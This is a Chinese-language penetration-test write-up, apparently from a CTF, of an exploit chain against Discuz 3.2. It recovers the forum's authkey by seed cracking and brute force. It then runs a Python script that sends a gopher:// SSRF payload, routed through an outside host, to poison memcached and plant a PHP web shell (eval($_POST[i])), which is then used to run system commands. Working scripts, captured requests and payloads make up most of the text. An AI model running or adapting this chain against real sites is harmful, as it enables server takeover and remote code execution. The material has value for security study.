针对discuz3.2的渗透测试

漏洞原理描述
https://zhuanlan.zhihu.com/p/51907363
想要利用这个漏洞得知道key的前缀，首先在注册的地方抓包

GET /member.php?mod=register HTTP/1.1
Host: 103.108.67.223:8822
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: t2xl_2132_saltkey=gdBDOHes; t2xl_2132_lastvisit=1695128831; t2xl_2132_home_readfeed=1695139099; t2xl_2132_sid=uKH55w; t2xl_2132_lastact=1695393413%09misc.php%09seccode; t2xl_2132_onlineusernum=4; t2xl_2132_sendmail=1; t2xl_2132_seccode=1.6245ef1d965178b2cf
Upgrade-Insecure-Requests: 1

得到这个三个参数
cookie_pre:t2xl
saltkey :gdBDOHes
seccode=1.6245ef1d965178b2cf

有这些就足够了 先用脚本生成php_mt_seed的参数

脚本下载地址
https://github.com/openwall/php_mt_seed

#./php_mt_seed.sh 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 55 55 0 61 28 28 0 61 59 59 0 61 47 47 0 61 >2.txt
#cat 2.txt | awk ‘{print $3}’|tr -s ‘\n’ >seeds.txt

然后用脚本爆破authkey

$seeds_file = file_get_contents('seeds.txt');
$seeds = explode("\n",$seeds_file);
//var_dump($seeds);
for($i=0;$i<count($seeds);$i++){
    mt_srand(intval($seeds[$i]));
    $auth_key = random(10);
    $tmp = random(4);
    if($tmp == 't2xl'){
        echo "=====================================\n";
        echo "seed:".intval($seeds[$i])."\n";
        echo "key:".$auth_key."\n";
        check($auth_key);
    }
}
function check($key){
    $saltkey = 'gdBDOHes';
    for($i=0;$i<16777215;$i++){
        if($i%1000000==0){
            echo ".";
        }
        if(substr(md5('10'.md5(pad($i).$key.$saltkey)),8,18)=='6245ef1d965178b2cf'){
        //90=ssid.$_G['uid'] ssid来自seccode 9 uid是0
            echo "\nFound key:".pad($i).$key;
            die();
        }
    }
    echo "\n";
}
function pad($i){
    $h = dechex($i);
    $h = strlen($h)==6?$h:str_repeat('0',6-strlen($h)).$h;
    return $h;
}
function random($length) {
    $hash = '';
    $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
    $max = strlen($chars) - 1;
    for($i = 0; $i < $length; $i++) {
        $hash .= $chars[mt_rand(0, $max)];
    }
    return $hash;
}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44

import requests
import base64
import sys
import time

memory_prefix = 'Pyk94mAlBUt2xlWzj0Ps3tPuwkQLyNAQbvyQw5qQn69DKxNL11Vh'.split('t2xl')[1][:6]
payload = f"gopher://localhost:11211/_set%20{memory_prefix}_setting%201%200%20222%0Aa%3A2%3A%7Bs%3A6%3A%22output%22%3Ba%3A1%3A%7Bs%3A4%3A%22preg%22%3Ba%3A2%3A%7Bs%3A6%3A%22search%22%3Ba%3A1%3A%7Bs%3A7%3A%22plugins%22%3Bs%3A5%3A%22%2F.*%2Fe%22%3B%7Ds%3A7%3A%22replace%22%3Ba%3A1%3A%7Bs%3A7%3A%22plugins%22%3Bs%3A68%3A%22file_put_contents('.%2Fdata%2Fcache%2Fs1s.php'%2C'%3C%3Fphp%20eval(%24_POST%5Bi%5D)%3B%3F%3E')%22%3B%7D%7D%7Ds%3A13%3A%22rewritestatus%22%3Bi%3A1%3B%7D"

gopher = base64.b64encode(payload.encode()).decode()

attack_url = f'http://23.95.215.34/index.php?url={gopher}'

cookies = {
    "home_lang":"cn",
    "admin_lang":"cn", 
    "t2xl_2132_saltkey":"TqPuF2ai", 
    "t2xl_2132_lastvisit":"1695123382",
    "t2xl_2132_seccode":"2.2c72b0f6f9fd3e206c", 
    "t2xl_2132_sid":"OwGkfW",
    "t2xl_2132_lastact":"1695318878%09forum.php%09ajax"
}
url = f'http://103.108.67.223:8822/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]{attack_url}.jpg[/img]&inajax=1&fid=2&wysiwyg=1&formhash=362a2904&posttime=1476777238&wysiwyg=1&subject=test&unused%5B%5D=1'

re1 = requests.get(url,cookies=cookies)

re2 = requests.get("http://103.108.67.223:8822/forum.php?mod=ajax&action=getthreadtypes&inajax=yes")

re3 = requests.post('http://103.108.67.223:8822/data/cache/s1s.php',data={'i':'system("cat /flag");'})
if(re3.status_code!=404):
    print(re3.text)

            


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34